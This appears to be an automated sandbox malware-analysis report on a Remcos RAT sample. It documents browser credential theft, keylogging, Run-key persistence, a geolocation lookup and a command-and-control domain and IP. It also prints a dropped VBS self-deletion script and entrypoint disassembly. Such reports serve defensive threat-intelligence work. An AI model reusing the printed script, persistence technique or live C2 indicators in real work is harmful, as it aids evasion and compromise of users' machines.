              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DA7A2 GetComputerNameExW,GetUserNameW,2_2_000DA7A2
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0010800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,2_2_0010800F
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004999D0 GetVersionExA,0_2_004999D0
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data2_2_000CB21B
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\2_2_000CB335
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: \key3.db2_2_000CB335

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: cmd.exe2_2_000C5042

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		Valid Accounts1
              Native API              		11
              Scripting              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		12
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts12
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              Bypass User Account Control              		1
              Deobfuscate/Decode Files or Information              		211
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol211
              Input Capture              		2
              Encrypted Channel              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts2
              Service Execution              		1
              Windows Service              		1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		2
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Registry Run Keys / Startup Folder              		1
              Windows Service              		1
              DLL Side-Loading              		NTDS3
              File and Directory Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script122
              Process Injection              		1
              Bypass User Account Control              		LSA Secrets24
              System Information Discovery              		SSHKeylogging12
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Registry Run Keys / Startup Folder              		1
              File Deletion              		Cached Domain Credentials21
              Security Software Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading              		DCSync1
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Virtualization/Sandbox Evasion              		Proc Filesystem2
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Access Token Manipulation              		/etc/passwd and /etc/shadow1
              Application Window Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron122
              Process Injection              		Network Sniffing1
              System Owner/User Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              4wECQoBvYC.exe29%ReversingLabsWin32.Trojan.Dresmon

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              formationslistcomplet2.sexidude.com100%Avira URL Cloudmalware
              http://www.evenbalance.com/0%Avira URL Cloudsafe
              http://www.evenbalance.com/index.php?page=pbsvcfaq.php0%Avira URL Cloudsafe
              http://www.evenbalance.com/index.php?page=pbsvcfaq.phpChecking0%Avira URL Cloudsafe
              http://www.evenbalance.com/troubleticket/0%Avira URL Cloudsafe
              http://www.evenbalance.com/index.php?page=pbsvcfaq.phpDisplayVersion%d.%dDisplayNamePunkBuster0%Avira URL Cloudsafe
              http://www.evenbalance.com/troubletick0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              formationslistcomplet2.sexidude.com
              		181.131.217.244
              		truefalse
                		high
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpfalse
                    		high
                    formationslistcomplet2.sexidude.comtrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.evenbalance.com/troubletick4wECQoBvYC.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.evenbalance.com/PerfectouinVans.exe.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.evenbalance.com/index.php?page=pbsvcfaq.phpCheckingPerfectouinVans.exe.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.evenbalance.com/troubleticket/PerfectouinVans.exe.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://geoplugin.net/4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://geoplugin.net/json.gp/C4wECQoBvYC.exe, 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, 4wECQoBvYC.exe, 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        http://geoplugin.net/json.gpl4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B04000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://www.evenbalance.com/index.php?page=pbsvcfaq.phpPerfectouinVans.exe.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://geoplugin.net/json.gpq4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.evenbalance.com/index.php?page=pbsvcfaq.phpDisplayVersion%d.%dDisplayNamePunkBuster4wECQoBvYC.exe, PerfectouinVans.exe.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://geoplugin.net/json.gp:4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://geoplugin.net/json.gpSystem324wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B04000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                181.131.217.244
                                		formationslistcomplet2.sexidude.comColombia
                                		13489EPMTelecomunicacionesSAESPCOfalse
                                178.237.33.50
                                		geoplugin.netNetherlands
                                		8455ATOM86-ASATOM86NLfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1571962
                                Start date and time:2024-12-09 22:41:05 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 20s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:4wECQoBvYC.exe
                                renamed because original name is a hash value
                                Original Sample Name:472cd96b1b5771243c40c10cd034324e.exe
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@5/4@2/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 71%
                                • Number of executed functions: 43
                                • Number of non-executed functions: 260
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: 4wECQoBvYC.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                16:42:40API Interceptor1777688x Sleep call for process: 4wECQoBvYC.exe modified
                                22:42:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
                                22:42:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PerfectouinVans C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                181.131.217.244nlfb.exeGet hashmaliciousUnknownBrowse
                                  nlfb.exeGet hashmaliciousUnknownBrowse
                                    qtIh.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                      KWAo.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                        build.exeGet hashmaliciousUnknownBrowse
                                          build.exeGet hashmaliciousUnknownBrowse
                                            178.237.33.50Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            PEbZthAqV9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • geoplugin.net/json.gp
                                            IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • geoplugin.net/json.gp
                                            NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            formationslistcomplet2.sexidude.comnlfb.exeGet hashmaliciousUnknownBrowse
                                            • 181.131.217.244
                                            nlfb.exeGet hashmaliciousUnknownBrowse
                                            • 181.131.217.244
                                            qtIh.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 181.131.217.244
                                            KWAo.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 181.131.217.244
                                            build.exeGet hashmaliciousUnknownBrowse
                                            • 181.131.217.244
                                            build.exeGet hashmaliciousUnknownBrowse
                                            • 181.131.217.244
                                            geoplugin.netAktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            PEbZthAqV9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 178.237.33.50
                                            IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 178.237.33.50
                                            NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            EPMTelecomunicacionesSAESPCOOwari.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 190.128.48.30
                                            Owari.mpsl.elfGet hashmaliciousUnknownBrowse
                                            • 190.29.49.244
                                            jew.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 191.94.154.123
                                            jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                            • 181.128.175.138
                                            sora.mips.elfGet hashmaliciousMiraiBrowse
                                            • 190.28.71.120
                                            i586.elfGet hashmaliciousUnknownBrowse
                                            • 190.71.244.100
                                            home.arm.elfGet hashmaliciousMirai, GafgytBrowse
                                            • 190.29.50.138
                                            jew.sh4.elfGet hashmaliciousUnknownBrowse
                                            • 190.70.10.219
                                            jew.arm6.elfGet hashmaliciousUnknownBrowse
                                            • 191.98.56.88
                                            jew.sh4.elfGet hashmaliciousUnknownBrowse
                                            • 201.184.41.50
                                            ATOM86-ASATOM86NLAktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            PEbZthAqV9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 178.237.33.50
                                            IB9876789000.bat.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            17334752451c3a43189360a7e5b86f13b5ea7a6044304256a8f4c49ad5d5bd4831e72ee12e792.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 178.237.33.50
                                            NewOrder12052024.jsGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            W6iQkG4jZ1.exeGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            VERSION.dll.dllGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\registro\registros.dat

                                            Download File
                                            Process:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):488
                                            Entropy (8bit):3.338316661577143
                                            Encrypted:false
                                            SSDEEP:12:6l9NOlMecml9NcbWFe5Ul9NwMQcl9NwEAbWFe5Ul9Ne6cl9NgbW+:6vNKxcmvNoWqUvNwMQcvNwNWqUvNWvNw
                                            MD5:EF1EF533085B93F52C99FAA4F96ED3C5
                                            SHA1:00995B2944CFAE2AA71F1DD95C30FFF51BDE29A3
                                            SHA-256:99D5BFE198CD277CFAE118C24F886F860EE00738551652B469CEAD4033197EB6
                                            SHA-512:C5631851E8ED73336044549F7A07989D2A4AEEC95D9AE3FC6F8012AB153508D89423FFF6A72B3183ED128C9C978983CEF42A8657F99DE450E9FB54891B4542E6
                                            Malicious:false
                                            Reputation:low
                                            Preview:....[.2.0.2.4./.1.2./.0.9. .1.6.:.4.2.:.0.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.2./.0.9. .1.6.:.4.2.:.0.8. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.0.9. .1.6.:.4.2.:.1.3. .R.u.n.].........[.2.0.2.4./.1.2./.0.9. .1.6.:.4.2.:.1.9. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.2.0.2.4./.1.2./.0.9. .1.6.:.4.2.:.2.1. .R.u.n.].........[.2.0.2.4./.1.2./.0.9. .1.6.:.4.2.:.2.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                                            Download File
                                            Process:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):963
                                            Entropy (8bit):5.012684553542002
                                            Encrypted:false
                                            SSDEEP:12:tkluJnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7S:qluNdbauKyGX85jvXhNlT3/7CcVKWro
                                            MD5:63E9F54FEF35B0883D8C0860F2439D33
                                            SHA1:0D967A12EDADB3087645596E3A31A6B63962AEE9
                                            SHA-256:9BA9E5646C3B7AE142B3D3B202C18DBDF64348DED02151FEFDE725CE36FB1067
                                            SHA-512:0560D4E5D0AD7E48BC96386A6ABB2799355119C0E9590D590B383D8F9CB33F0BF30AB9EA1B350DCE25081CC9D5FB8C18B66FCE3A08B7DFE7DABDD9B0D626FC31
                                            Malicious:false
                                            Reputation:low
                                            Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                            C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs

                                            Download File
                                            Process:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):472
                                            Entropy (8bit):3.5107221010612366
                                            Encrypted:false
                                            SSDEEP:12:xQ4lA2++ugypjBQMPURoFEOw4Q3DxFEOw49Hz/0aimi:7a2+SD/Ow4QT4Ow49Aait
                                            MD5:FE625459219AA77126B7B2EDF44A165E
                                            SHA1:270E12ED960A2E1E767183B6832C4F3259299090
                                            SHA-256:C0B8168638F19DC83B83DD1C66CA5F39CC2B65D4F705418FB643F3228B597F48
                                            SHA-512:B8F082E1D9B7677945D87DF5AA6666D6C27EC57A2D5E245F2232193945BAF52B923B3390E1C0C18132C85BCE094C221D997B58901630E48C8FA40754E6EFEBBC
                                            Malicious:true
                                            Reputation:low
                                            Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.\.4.w.E.C.Q.o.B.v.Y.C...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.D.e.s.k.t.o.p.\.4.w.E.C.Q.o.B.v.Y.C...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

                                            C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\4wECQoBvYC.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):979567347
                                            Entropy (8bit):0.0665821266031963
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:A2F65E3E0026D92BC192BBBB7A5F9ABB
                                            SHA1:FE436C6917BEBFBBD1B5F83C3C3314024C4949CB
                                            SHA-256:C399A6F27A2C4E0D39BF2AB8B22E1372B2DB28C54BAE81BDADF21D9D4312D4D6
                                            SHA-512:D39D876A88EA94B21F09B07927CFC38E664D489F55D23836AE83856AA84C2EB8439074D628243407E98A564C4DC23868B5295CC28C3CFEB13797DDF8F95486A6
                                            Malicious:true
                                            Reputation:low
                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...........j...j...j...b..j...f...j...f..8j...b...j..MI...j...b...j...b...j..mI...j...j...h...}...j...}.^j...f..j..{a...j...f...j..Rich.j..........................PE..L...xm*K.....................P0.....S.............@...........................?.....@:/.....................................<........p...l..............................................................H............................................text...D........................... ..`.rdata..p...........................@..@.data............@..................@....rsrc....l...p...p....,.............@..@................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.596232553765719
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:4wECQoBvYC.exe
                                            File size:4'087'808 bytes
                                            MD5:472cd96b1b5771243c40c10cd034324e
                                            SHA1:e6544fd71357a36bf5bad454a2662ef3af7a4e03
                                            SHA256:24c3329fc783efce51593d5e4274008fcff8d86f8df9fd8a47ca0af8df1e031d
                                            SHA512:3ed7fbffc297595e71193c26e3d6468f943dd94f13fbdd65358c4e47c89ab35f50c294894f6e798e05491de9518d8281864752659f84f33fea589099ed466a1f
                                            SSDEEP:49152:SqXI6JHV5G/XEeLTSB/PzpvxGDNMzZxiOkwSF3Gsw/D+ZuWjH6CiolZ:St6JHS/KnzpvxGpM9xUX3rPjR
                                            TLSH:A416E164B38782F5CA93207498D5ABAD659963F44F3746C3B3952D2F1B793C10A3B388
                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............j...j...j...b...j...f...j...f..8j...b...j..MI...j...b...j...b...j..mI...j...j...h...}...j...}..^j...f...j..{a...j...f...j.

                                            File Icon

                                            Icon Hash:1f3371716373338f

                                            Static PE Info

                                            General

                                            Entrypoint:0x4bda53
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                            DLL Characteristics:
                                            Time Stamp:0x4B2A6D78 [Thu Dec 17 17:42:16 2009 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:9d6d3b6b8f33f014f5a7c8d694c9773f

                                            Entrypoint Preview

                                            Instruction
                                            push 00000060h
                                            push 0050EEA0h
                                            call 00007F1998FBE17Eh
                                            mov edi, 00000094h
                                            mov eax, edi
                                            call 00007F1998FBD51Ah
                                            mov dword ptr [ebp-18h], esp
                                            mov esi, esp
                                            mov dword ptr [esi], edi
                                            push esi
                                            call dword ptr [004E136Ch]
                                            mov ecx, dword ptr [esi+10h]
                                            mov dword ptr [006E55E0h], ecx
                                            mov eax, dword ptr [esi+04h]
                                            mov dword ptr [006E55ECh], eax
                                            mov edx, dword ptr [esi+08h]
                                            mov dword ptr [006E55F0h], edx
                                            mov esi, dword ptr [esi+0Ch]
                                            and esi, 00007FFFh
                                            mov dword ptr [006E55E4h], esi
                                            cmp ecx, 02h
                                            call 00007F1998F5E910h
                                            add byte ptr [eax], 00000000h
                                            mov dword ptr [006E55E4h], esi
                                            shl eax, 08h
                                            add eax, edx
                                            mov dword ptr [006E55E8h], eax
                                            xor esi, esi
                                            push esi
                                            mov edi, dword ptr [004E1388h]
                                            call edi
                                            cmp word ptr [eax], 5A4Dh
                                            jne 00007F1998FBE931h
                                            mov ecx, dword ptr [eax+3Ch]
                                            add ecx, eax
                                            cmp dword ptr [ecx], 00004550h
                                            jne 00007F1998FBE924h
                                            movzx eax, word ptr [ecx+18h]
                                            cmp eax, 0000010Bh
                                            je 00007F1998FBE931h
                                            cmp eax, 0000020Bh
                                            je 00007F1998FBE917h
                                            mov dword ptr [ebp-1Ch], esi
                                            jmp 00007F1998FBE939h
                                            cmp dword ptr [ecx+00000084h], 0Eh
                                            jbe 00007F1998FBE904h
                                            xor eax, eax
                                            cmp dword ptr [ecx+000000F8h], esi
